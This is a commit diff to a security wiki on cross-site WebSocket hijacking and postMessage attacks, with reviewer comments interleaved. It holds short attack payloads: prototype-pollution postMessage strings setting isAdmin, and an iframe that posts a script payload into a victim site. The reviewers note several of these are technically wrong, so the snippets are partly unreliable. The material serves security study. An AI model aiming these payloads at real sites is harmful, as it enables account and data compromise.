GitBook: [#2843] upload send postmessage

CPol 2021-11-14 22:56:00 +00:00 committed by gitbook-bot
parent 41189a39f2
commit adb4b651ca
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 6 additions and 3 deletions

View file

@ -83,9 +83,7 @@ An attacker can create a **malicious web page** on their own domain which **esta
### Simple Attack
Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. 
Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
This attack allows you to make the client connect to websocket server and send some predefined value.
```markup
<script>
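Review bot: the sentence starting "Then, if for example the websocket server sends back the history of the conversation" attributes the attack to "a simple XSS", but the surrounding context ("a malicious web page on their own domain", the cookie being sent automatically) describes a cross-site page, not XSS; the whole point of the technique is that no XSS is needed because the browser attaches the session cookie to a cross-origin WebSocket handshake. Suggest "a page on the attacker's domain that establishes the connection" instead. Since the attack hinges on that cookie being attached, the same sentence should carry the caveat that it only works when the cookie is not SameSite-restricted (browsers do not attach SameSite=Lax or Strict cookies to a handshake initiated from a cross-site page) and the server does not check the Origin header. Also drop the stray ".:" at the end of that sentence; and the line "This attack allows you to make the client connect to websocket server and send some predefined value." now just restates the "READY" example and reads better merged into the opening sentence of the section.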
@ -102,6 +100,8 @@ function handleReply(event) {
</script>
```
Usually this will be useless as what you want is to get the information the real user is sending and the responses.
### Stealing data from user
Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:
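Review bot: "Usually this will be useless" contradicts the Simple Attack immediately above, where sending the predefined "READY" message already leaks the victim's conversation history; suggest wording such as "This only helps when the server answers a fixed message with sensitive data; to see what the real user sends and receives you need the approach below." The new "Stealing data from user" section should also state its prerequisite up front: copying the application's .html files and editing its WebSocket script means the victim must be using the attacker's copy of the page, i.e. a phishing clone, which is a different threat model from the cross-origin attack above, where the victim only has to visit an attacker page while logged into the real site.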

View file

@ -14,6 +14,9 @@ window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
<iframe id="idframe" src="http://victim.com/"></iframe>
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an iframe via onload
<iframe src="https://victim.com/" onload="this.contentWindow.postMessage('<script>print()</script>','*')">
# postMessage to an URL
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
```
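Review bot: the three '{"__proto__":{"isAdmin":True}}' payloads are not valid JSON: `True` is Python, and a listener that does JSON.parse(event.data) will throw instead of being prototype-polluted, so change it to lowercase `true`. On the new onload line, the '<script>print()</script>' payload only fires if the receiver writes event.data into the DOM through a sink that executes scripts; innerHTML does not run inline <script>, so an event-handler payload such as <img src=x onerror=print()> demonstrates the sink more reliably, and the line deserves a comment saying which sink it targets. The last example, labelled "postMessage to an URL", calls postMessage on the attacker's own window, so nothing reaches company.com: the second argument is a targetOrigin filter, not a destination, and the message is delivered to the window the method is called on only if that window's origin matches. Suggest document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":true}}', 'https://company.com') with the comment "restrict delivery to a specific target origin". Minor: the `#` comment lines are not valid in an HTML/JavaScript block; use `//` or `<!-- -->` so the snippets can be pasted as-is.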